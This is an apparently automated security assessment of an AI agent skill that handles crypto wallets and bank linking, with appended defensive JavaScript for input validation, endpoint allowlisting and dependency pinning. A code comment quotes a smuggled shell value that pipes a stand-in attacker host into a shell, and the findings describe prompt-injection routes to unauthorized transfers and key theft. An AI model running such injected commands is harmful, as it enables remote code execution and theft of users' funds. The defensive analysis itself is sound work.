Trust Assessment
autonomous-agent received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 5 findings: 1 critical, 2 high, 2 medium and 0 low severity. Key findings: an unpinned npm dependency version, excessive financial and identity-management permissions granted to the skill, and potential command injection via `npm run` and `npx` scripts.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 33/100; it is the layer that raised the critical finding and both high findings listed below.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (5)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Potential for command injection via `npm run` and `npx` scripts. The skill's documentation (`SKILL.md`) and `package.json` expose several `npm run` and `npx` commands that execute local Node.js scripts (e.g., `src/transfer.js`, `src/run-agent.js`). If the arguments passed to these commands (`<chain>`, `<to>`, `<amount>` and `[tokenAddress]` for `npm run transfer`, or the prompt string for `npx cornerstone-agent`) are taken from untrusted input and concatenated into a shell command string, an attacker can inject arbitrary shell commands, leading to remote code execution, data exfiltration or system compromise. Recommendation: validate every user-supplied argument against its expected format before it reaches a shell or script; never concatenate untrusted input into a command string; launch scripts with `child_process.spawn` or `execFile` and an argument array, so each value is passed as a distinct argv entry rather than parsed by a shell. | LLM | SKILL.md:70 |
| HIGH | Skill grants excessive financial and identity management permissions. The skill is designed to perform highly sensitive actions: creating, funding and managing cryptocurrency wallets (Aptos and EVM), linking bank accounts via third-party services (CornerStone/Plaid), transferring and swapping tokens, and signing wallet attestations for onboarding. These are intended features, but together they are a broad set of permissions that, if abused through prompt injection or other means, could cause significant financial loss, unauthorized transactions or identity theft; the agent's ability to run payment flows and sign attestations autonomously amplifies the risk. Recommendation: require explicit user confirmation for every sensitive action (transfers, bank linking, attestations) and enforce it outside the model so that no prompt can bypass it; sandbox the agent's execution environment and limit its access to external resources; consider multi-factor authentication for critical operations. | LLM | SKILL.md:10 |
| HIGH | Configurable external URLs and sensitive environment variables create an exfiltration risk. The skill requires `MCP_SERVER_URL`, `X402_FACILITATOR_URL`, `HUGGINGFACE_API_KEY` and `EVM_PRIVATE_KEY` to be configured. If an attacker can change `MCP_SERVER_URL` or `X402_FACILITATOR_URL` (for example through prompt injection), the agent can be pointed at a malicious server, enabling exfiltration of wallet attestations and transaction details or harvesting of API keys and private keys. Exposure of `EVM_PRIVATE_KEY` grants full control of the associated EVM wallet. Recommendation: validate both URLs against an allowlist of expected hosts and reject anything else; keep `EVM_PRIVATE_KEY` and `HUGGINGFACE_API_KEY` out of the LLM context, logs and any insecure channel; handle them through a secrets manager or encrypted storage with minimal scope of access. | LLM | SKILL.md:30 |
| MEDIUM | Unpinned npm dependency version. Dependency `@langchain/core` is not pinned to an exact version (`^0.3.0`). Pin dependencies to exact versions to reduce drift and supply-chain risk. | Dependencies | skills/josephrp/autonomous/package.json |
| MEDIUM | Unpinned dependencies in `package.json`. Most dependencies use caret ranges (e.g., `@langchain/core: ^0.3.0`, `dotenv: ^16.0.0`), so an `npm install` that does not honour the lockfile may resolve to newer minor or patch versions than were tested, and a malicious release within the range would be picked up without any developer action. `package-lock.json` pins the resolved versions, but only `npm ci` fails on a mismatch; `npm install` can rewrite the lockfile, so build environments that rely on it alone remain exposed. Recommendation: pin dependencies to exact versions (`1.2.3` rather than `^1.2.3` or `~1.2.3`), install with `npm ci` in CI, and update dependencies deliberately through audited, reviewed version bumps. | LLM | package.json:43 |
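The following is an added example, not code from the skill or from SkillShield, showing the hardening the critical finding recommends for the `npm run transfer <chain> <to> <amount> [tokenAddress]` entry point: each argument is validated against a strict format, and the script is launched with `execFile` and an argv array instead of a shell string. The supported chain names, the address formats and the `src/transfer.js` invocation shape are assumptions drawn from the finding text, not the skill's real implementation.

```javascript
// Added example (not the skill's own code): hardening the transfer entry point
// described in the critical finding. Chain names, address formats and the
// `src/transfer.js` path are assumptions; the page does not show the real script.
const { execFileSync } = require("node:child_process");

const SUPPORTED_CHAINS = new Set(["aptos", "evm"]); // assumption: the page names Aptos and EVM wallets

// Vulnerable pattern: untrusted arguments concatenated into a shell string.
// Passed to exec(), a `to` value such as "0xabc; curl attacker.example | sh"
// is parsed by the shell and the second command runs.
function buildVulnerableCommand(chain, to, amount) {
  return `npm run transfer -- ${chain} ${to} ${amount}`;
}

// Validate each argument against a strict grammar before it reaches any process.
function validateTransferArgs({ chain, to, amount, tokenAddress }) {
  const errors = [];
  if (!SUPPORTED_CHAINS.has(chain)) errors.push(`unsupported chain: ${chain}`);
  if (chain === "evm" && !/^0x[0-9a-fA-F]{40}$/.test(to)) errors.push("to is not an EVM address");
  if (chain === "aptos" && !/^0x[0-9a-fA-F]{1,64}$/.test(to)) errors.push("to is not an Aptos address");
  // positive decimal with at most 18 fractional digits; no sign, exponent or whitespace
  if (!/^(0|[1-9]\d*)(\.\d{1,18})?$/.test(amount) || Number(amount) <= 0) {
    errors.push("amount must be a positive decimal");
  }
  if (tokenAddress !== undefined && !/^0x[0-9a-fA-F]{40}$/.test(tokenAddress)) {
    errors.push("tokenAddress is not an EVM address");
  }
  return errors;
}

// Hardened pattern: build an argv array for execFile. No shell is involved, so
// metacharacters in `to` or `amount` reach the child as literal bytes.
function buildSafeInvocation(args) {
  const errors = validateTransferArgs(args);
  if (errors.length) throw new Error(`rejected transfer arguments: ${errors.join("; ")}`);
  const argv = ["src/transfer.js", args.chain, args.to, args.amount];
  if (args.tokenAddress !== undefined) argv.push(args.tokenAddress);
  return { file: process.execPath, argv }; // node <script> <chain> <to> <amount> [tokenAddress]
}

// Runs the validated invocation; stdout is returned, stderr is passed through.
function runTransfer(args) {
  const { file, argv } = buildSafeInvocation(args);
  return execFileSync(file, argv, { encoding: "utf8", stdio: ["ignore", "pipe", "inherit"] });
}
```

`buildVulnerableCommand` is kept only to show the pattern the finding warns about. In `buildSafeInvocation` the same injected `to` value is rejected by validation, and even if validation were skipped, `execFile` would hand it to the child as one argument rather than let a shell interpret the `;`.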
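Added example (not the skill's or SkillShield's code) for the second high finding: the two endpoint settings are validated against an allowlist of expected hosts before use, secrets are kept apart from the configuration the model can see, and known secret values are scrubbed from text before it is logged or placed in a prompt. The allowlisted hostnames are placeholders, since the page does not name the legitimate servers.

```javascript
// Added example (not the skill's own code): endpoint allowlisting and secret
// handling for the environment variables named in the finding. The hosts in
// ENDPOINT_ALLOWLIST are assumptions; substitute the real MCP and x402 endpoints.
const ENDPOINT_ALLOWLIST = {
  MCP_SERVER_URL: new Set(["mcp.example.com"]),                 // assumption
  X402_FACILITATOR_URL: new Set(["facilitator.example.com"]),   // assumption
};

// Values that must never be serialized into a prompt, tool result or log line.
const SECRET_ENV_VARS = ["EVM_PRIVATE_KEY", "HUGGINGFACE_API_KEY"];

// Accept only https URLs, without embedded credentials, whose host is allowlisted.
function validateEndpoint(name, value) {
  let url;
  try { url = new URL(value); } catch { return { ok: false, reason: `${name}: not a URL` }; }
  if (url.protocol !== "https:") return { ok: false, reason: `${name}: scheme must be https` };
  if (url.username || url.password) return { ok: false, reason: `${name}: credentials embedded in URL` };
  if (!ENDPOINT_ALLOWLIST[name].has(url.hostname)) {
    return { ok: false, reason: `${name}: host ${url.hostname} is not allowlisted` };
  }
  return { ok: true, url: url.href };
}

// Split the process environment into validated, model-visible config and secrets
// that stay with the signing/HTTP code only. Throws on any bad endpoint.
function splitConfig(env) {
  const config = {};
  for (const name of Object.keys(ENDPOINT_ALLOWLIST)) {
    const result = validateEndpoint(name, env[name] ?? "");
    if (!result.ok) throw new Error(result.reason);
    config[name] = result.url;
  }
  const secrets = {};
  for (const name of SECRET_ENV_VARS) {
    if (env[name]) secrets[name] = env[name];
  }
  return { config, secrets };
}

// Scrub secrets from text before logging or prompting: exact known values first,
// then 32-byte hex strings (private-key shaped, with or without 0x) and hf_ tokens.
function redactSecrets(text, secrets = {}) {
  let out = text;
  for (const value of Object.values(secrets)) {
    if (value) out = out.split(value).join("[REDACTED]");
  }
  out = out.replace(/\b(0x)?[0-9a-fA-F]{64}\b/g, "[REDACTED_HEX64]");
  out = out.replace(/\bhf_[A-Za-z0-9]{20,}\b/g, "[REDACTED_HF_TOKEN]");
  return out;
}
```

The 64-hex-character pattern in `redactSecrets` also masks transaction hashes, which have the same shape; that is a deliberate trade-off for anything leaving the process, and the exact-value pass catches a key regardless of how it is formatted. Only `config` should ever be reachable from code that builds prompts or tool results.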
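Added example (not from the skill or SkillShield) for the two unpinned-dependency findings: a check that reads a `package.json` object and reports every dependency specifier that is not an exact version. The sample manifest is constructed for illustration; only the two specifiers quoted in the findings are taken from the report.

```javascript
// Added example (not the skill's own code): flag dependency specifiers that are
// ranges, tags or URLs rather than exact versions. SAMPLE_MANIFEST is constructed;
// only `@langchain/core: ^0.3.0` and `dotenv: ^16.0.0` come from the report.

// Exact semver: MAJOR.MINOR.PATCH with optional prerelease and build metadata.
const EXACT_VERSION = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/;

const DEPENDENCY_FIELDS = ["dependencies", "devDependencies", "optionalDependencies"];

// Returns every { field, name, spec } whose spec is not an exact version.
function findUnpinned(manifest) {
  const unpinned = [];
  for (const field of DEPENDENCY_FIELDS) {
    for (const [name, spec] of Object.entries(manifest[field] ?? {})) {
      // Anything that is not exact (^, ~, >=, *, "latest", git/URL specs) lets an
      // install that ignores the lockfile resolve to a version nobody tested.
      if (!EXACT_VERSION.test(spec)) unpinned.push({ field, name, spec });
    }
  }
  return unpinned;
}

// Constructed sample manifest mixing the report's two specifiers with other shapes.
const SAMPLE_MANIFEST = {
  name: "sample-skill",
  dependencies: {
    "@langchain/core": "^0.3.0",
    dotenv: "^16.0.0",
    "pinned-lib": "1.2.3",
    "tag-dep": "latest",
  },
  devDependencies: { "tilde-dep": "~4.1.0" },
};

// Human-readable summary suitable for a CI log; non-zero count should fail the build.
function summarize(manifest) {
  const hits = findUnpinned(manifest);
  return {
    count: hits.length,
    names: hits.map((h) => h.name).sort(),
    lines: hits.map((h) => `${h.field}.${h.name}: "${h.spec}" is not an exact version`),
  };
}
```

Run this in CI before `npm ci`, which itself fails when `package.json` and `package-lock.json` disagree; `npm install --save-exact` (or `save-exact=true` in `.npmrc`) keeps newly added dependencies pinned so the check stays green.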
Full report: https://skillshield.io/report/c87403713e261074